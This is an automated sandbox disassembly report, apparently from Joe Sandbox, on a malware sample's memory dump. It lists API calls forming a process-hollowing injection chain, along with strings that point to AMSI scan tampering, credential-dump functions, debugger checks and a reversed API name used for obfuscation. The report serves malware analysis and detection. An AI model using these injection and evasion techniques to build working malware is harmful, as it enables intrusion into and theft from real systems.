Part of subcall function 02E589D0: FreeLibrary.KERNEL32(743E0000,00000000,00000000,00000000,00000000,02EC738C,Function_0000662C,00000004,02EC739C,02EC738C,05F5E103,00000040,02EC73A0,743E0000,00000000,00000000), ref: 02E58AAA

Part of subcall function 02E58788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E58814

GetThreadContext.KERNEL32(000008A0,02EC7424,ScanString,02EC73A8,02E5A93C,UacInitialize,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,UacInitialize,02EC73A8), ref: 02E59602

Part of subcall function 02E58400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E58471

Part of subcall function 02E58670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02E586D5

Part of subcall function 02E57A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E57A9F

Part of subcall function 02E57D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E57DEC

SetThreadContext.KERNEL32(000008A0,02EC7424,ScanBuffer,02EC73A8,02E5A93C,ScanString,02EC73A8,02E5A93C,Initialize,02EC73A8,02E5A93C,0000088C,002E0FF8,02EC74FC,00000004,02EC7500), ref: 02E5A317
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008A0,00000000,000008A0,02EC7424,ScanBuffer,02EC73A8,02E5A93C,ScanString,02EC73A8,02E5A93C,Initialize,02EC73A8,02E5A93C,0000088C,002E0FF8,02EC74FC), ref: 02E5A324

Part of subcall function 02E5894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize,02EC73A8,02E5A93C,UacScan), ref: 02E58960
Part of subcall function 02E5894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E5897A
Part of subcall function 02E5894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize), ref: 02E589B6

Strings

NtOpenObjectAuditAlarm, xrefs: 02E5A634, 02E5A6EC
SLGetLicenseInformation, xrefs: 02E5935F
I_QueryTagInformation, xrefs: 02E5A700
MiniDumpWriteDump, xrefs: 02E5A714
dbgcore, xrefs: 02E5A719, 02E5A72D
bcrypt, xrefs: 02E5A578, 02E5A58C, 02E5A5A0
ScanString, xrefs: 02E58E02, 02E58FAD, 02E5915B, 02E59583, 02E59769, 02E598F0, 02E59D7D, 02E59F3B, 02E5A0AB, 02E5A21E, 02E5A509, 02E5A5B6
UacScan, xrefs: 02E58E73, 02E5908B, 02E59687, 02E59A83, 02E59BF7, 02E5A3A1, 02E5A839
NtOpenProcess, xrefs: 02E5A8A3
MiniDumpReadDumpStream, xrefs: 02E5A728
BCryptRegisterProvider, xrefs: 02E5A59B
BCryptVerifySignature, xrefs: 02E5A573
UacInitialize, xrefs: 02E59032, 02E59393, 02E59512, 02E59616, 02E59A12, 02E59B86, 02E5A330
OpenSession, xrefs: 02E58DA9, 02E591CC, 02E5927E, 02E5A64F, 02E5A795
Initialize, xrefs: 02E590EA, 02E596F8, 02E5987F, 02E59C68, 02E59ECA, 02E5A03A, 02E5A1AD, 02E5A412, 02E5A743
ntdll, xrefs: 02E5A625, 02E5A639, 02E5A6F1, 02E5A894, 02E5A8A8
sppc, xrefs: 02E59376
BCryptQueryProviderRegistration, xrefs: 02E5A587
ScanBuffer, xrefs: 02E58ECC, 02E58F54, 02E592EF, 02E59404, 02E594A1, 02E597DA, 02E59961, 02E59AF4, 02E59CD9, 02E59DEE, 02E59FAC, 02E5A11C, 02E5A28F, 02E5A483, 02E5A6A1, 02E5A7E7
advapi32, xrefs: 02E5A705
NtSetSecurityObject, xrefs: 02E5A88F
NtReadVirtualMemory, xrefs: 02E5A620

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 2388221946-51457883
Opcode ID: fe3e179b36e8b1bcb1f6b2968a64281799ffea315843efd4c4f8f54c741b9327
Instruction ID: 70cdd365b531cd7cf10308f48cc2656ab507c634ed5cd2ffbc04620502224028
Opcode Fuzzy Hash: fe3e179b36e8b1bcb1f6b2968a64281799ffea315843efd4c4f8f54c741b9327
Instruction Fuzzy Hash: 14E2F174B901699BDB11FB64EC81BCE73BAAF85300F60E1B2B505AB254DE309E85CF51

Function 02E58D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E589D0: FreeLibrary.KERNEL32(743E0000,00000000,00000000,00000000,00000000,02EC738C,Function_0000662C,00000004,02EC739C,02EC738C,05F5E103,00000040,02EC73A0,743E0000,00000000,00000000), ref: 02E58AAA

Part of subcall function 02E58788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E58814

GetThreadContext.KERNEL32(000008A0,02EC7424,ScanString,02EC73A8,02E5A93C,UacInitialize,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,UacInitialize,02EC73A8), ref: 02E59602

Part of subcall function 02E58400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E58471

Part of subcall function 02E58670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02E586D5

Part of subcall function 02E57A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E57A9F

Strings

NtOpenObjectAuditAlarm, xrefs: 02E5A634, 02E5A6EC
SLGetLicenseInformation, xrefs: 02E5935F
I_QueryTagInformation, xrefs: 02E5A700
MiniDumpWriteDump, xrefs: 02E5A714
dbgcore, xrefs: 02E5A719, 02E5A72D
bcrypt, xrefs: 02E5A578, 02E5A58C, 02E5A5A0
ScanString, xrefs: 02E58E02, 02E58FAD, 02E5915B, 02E59583, 02E59769, 02E598F0, 02E59D7D, 02E59F3B, 02E5A0AB, 02E5A21E, 02E5A509, 02E5A5B6
UacScan, xrefs: 02E58E73, 02E5908B, 02E59687, 02E59A83, 02E59BF7, 02E5A3A1, 02E5A839
NtOpenProcess, xrefs: 02E5A8A3
MiniDumpReadDumpStream, xrefs: 02E5A728
BCryptRegisterProvider, xrefs: 02E5A59B
BCryptVerifySignature, xrefs: 02E5A573
UacInitialize, xrefs: 02E59032, 02E59393, 02E59512, 02E59616, 02E5A330
OpenSession, xrefs: 02E58DA9, 02E591CC, 02E5927E, 02E5A64F, 02E5A795
Initialize, xrefs: 02E590EA, 02E596F8, 02E5987F, 02E59C68, 02E59ECA, 02E5A03A, 02E5A1AD, 02E5A412, 02E5A743
ntdll, xrefs: 02E5A625, 02E5A639, 02E5A6F1, 02E5A894, 02E5A8A8
sppc, xrefs: 02E59376
BCryptQueryProviderRegistration, xrefs: 02E5A587
ScanBuffer, xrefs: 02E58ECC, 02E58F54, 02E592EF, 02E59404, 02E594A1, 02E597DA, 02E59961, 02E59AF4, 02E59CD9, 02E59DEE, 02E59FAC, 02E5A11C, 02E5A28F, 02E5A483, 02E5A6A1, 02E5A7E7
advapi32, xrefs: 02E5A705
NtSetSecurityObject, xrefs: 02E5A88F
NtReadVirtualMemory, xrefs: 02E5A620

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 3386062106-51457883
Opcode ID: 36b46be70243d312d62cc4ea23e39c04a91efd2c30b153799ee0c4b07a83f295
Instruction ID: 913e9ba3d008b6dcabb3db65a1fc0e1325274bdd775c0e1f4edb0c4f0911e5f1
Opcode Fuzzy Hash: 36b46be70243d312d62cc4ea23e39c04a91efd2c30b153799ee0c4b07a83f295
Instruction Fuzzy Hash: B8E2F174B901699BDB11FB64EC81BCE73BAAF85300F60E1B2B505AB254DE309E85CF51

Function 02E45ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E40000,02E6E790), ref: 02E45AE8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E40000,02E6E790), ref: 02E45B06
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E40000,02E6E790), ref: 02E45B24
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E45B42
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02E45BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E45B8B
RegQueryValueExA.ADVAPI32(?,02E45D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02E45BD1,?,80000001), ref: 02E45BA9
RegCloseKey.ADVAPI32(?,02E45BD8,00000000,?,?,00000000,02E45BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E45BCB
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02E45BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02E45BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02E45BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02E45C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E45C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E45C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E45CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E45CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02E45CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02E45CEB

Strings

Software\Borland\Locales, xrefs: 02E45AFC, 02E45B1A
Software\Borland\Delphi\Locales, xrefs: 02E45B38

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: fc22dbfb22063e69de4e12155933779b7b2b0e4bdc0f4888274b2719ca59ad49
Instruction ID: d9e5bfcfd1697234ed6001967d223ea365e64937c8e4f3f49d5b66096647603c
Opcode Fuzzy Hash: fc22dbfb22063e69de4e12155933779b7b2b0e4bdc0f4888274b2719ca59ad49
Instruction Fuzzy Hash: 14519771AC025C7BFF21D6A4AC46FEF77AD9B04744F8091A1BA08E6181DF749B848F64

Function 02E5894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize,02EC73A8,02E5A93C,UacScan), ref: 02E58960
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E5897A
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize), ref: 02E589B6

Part of subcall function 02E57D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E57DEC

Strings

BCryptVerifySignature, xrefs: 02E58973
bcrypt, xrefs: 02E5895F

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: b225a08d47b6e5224bf5128af3c9a32232344cea50772adec1c20f373e76e42e
Instruction ID: 783527b9fbbd5fa4024cbd5760d7025a4b27129b71b3f8993b72520f13818552
Opcode Fuzzy Hash: b225a08d47b6e5224bf5128af3c9a32232344cea50772adec1c20f373e76e42e
Instruction Fuzzy Hash: A2F0AFB1AC03145EE310A7EFA849F57B79C9782715F605979BD1C87140C7751CD28F50

Function 02E5F744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02E5F754
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E5F766
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E5F77D

Strings

KernelBase, xrefs: 02E5F74F
CheckRemoteDebuggerPresent, xrefs: 02E5F760

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: a4be1ee71a977a295d568867209256de55fc6f2e5eecb2b6e8da07407612ea14
Instruction ID: cfb50de49e4b089bb9334bf8be6b93c978140d49fcc82a6db3833c27b9e6f39c
Opcode Fuzzy Hash: a4be1ee71a977a295d568867209256de55fc6f2e5eecb2b6e8da07407612ea14
Instruction Fuzzy Hash: 7EF0EC71964258BAEB10A7F88C887DCFBB95B0732CF24D3D0EC35625C1E7710644CA51

Function 02E5DD70 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E44F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E44F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E5DE40), ref: 02E5DDAB
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02E5DE40), ref: 02E5DDDB
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02E5DDF0
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02E5DE1C
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02E5DE25

Part of subcall function 02E44C60: SysFreeString.OLEAUT32(02E5F4A4), ref: 02E44C6E

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: dca8f343d29966ee1cf0cae2519e3d1e0056f3f91568124458e8dea460921d59
Instruction ID: 8486447cacadc3b4b5b1113c87bd61124dc03c0d12f073a61555bcbeb330eda1
Opcode Fuzzy Hash: dca8f343d29966ee1cf0cae2519e3d1e0056f3f91568124458e8dea460921d59
Instruction Fuzzy Hash: 9E215371B90718BAEB41EAD4DC52FDE77BDEB08700F505461B700F71C0DA70AA448B54

Function 02E5E4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02E5E5F6

Strings

OpenSession, xrefs: 02E5E598
ScanBuffer, xrefs: 02E5E53F
Initialize, xrefs: 02E5E4E6

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: b746c06bd091de085295fac820cad89c0d52aa6994f90d903963cfa553dcd9ed
Instruction ID: 5fc11ec70997477485e557713e611db2060f4d9a73a8c205e493706a216bfd24
Opcode Fuzzy Hash: b746c06bd091de085295fac820cad89c0d52aa6994f90d903963cfa553dcd9ed
Instruction Fuzzy Hash: 20415375B901589BEB01EBA4E841FDE73FAEF88700F60D461F540A7680DE70AE018F55

Function 02E5DC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 02E44F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E44F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E5DD5E), ref: 02E5DCCB
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02E5DD05
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02E5DD32
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02E5DD3B

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 4b938fb1c0d76fd468cb7728d933eb1176fbbf846985004dbbfe1e4abe99d970
Instruction ID: 9ea660cd46484b963860db48aa919d12d0b1966863e3bf5a0230735f0c11b99d
Opcode Fuzzy Hash: 4b938fb1c0d76fd468cb7728d933eb1176fbbf846985004dbbfe1e4abe99d970
Instruction Fuzzy Hash: 25212171B90618BAEB50EAD0DC52FDEB3BDEB05B00F609561B600F71C0DBB06A048B64

Function 02E57A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E

Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E57A9F

Strings

yromeMlautriVetacollAwZ, xrefs: 02E57A47
ntdll, xrefs: 02E57A74

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 77dd5883a98e71204f2eb64941f08b299ecb65b6e812b44f22d520ce8b6fd0ae
Instruction ID: 8c02ef756e3e49c6f00fd40d33711312c3b8fd8da56edc9b8289fb937b231929
Opcode Fuzzy Hash: 77dd5883a98e71204f2eb64941f08b299ecb65b6e812b44f22d520ce8b6fd0ae
Instruction Fuzzy Hash: 9A1121756D0208BFEB04DFA4EC41F9EBBADEB48700F519460BD04D7640DA34AA51CF64

Function 02E57A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E

Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E57A9F

Strings

yromeMlautriVetacollAwZ, xrefs: 02E57A47
ntdll, xrefs: 02E57A74

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: d4a31a5fe7634c622782e6d16aabf769081ef80f4dd376234e381225d84e14cf
Instruction ID: 9580389336d29f6b88124f4ae0b0f79ba7a8c90ee2a9202b937b3ed94dac29ce
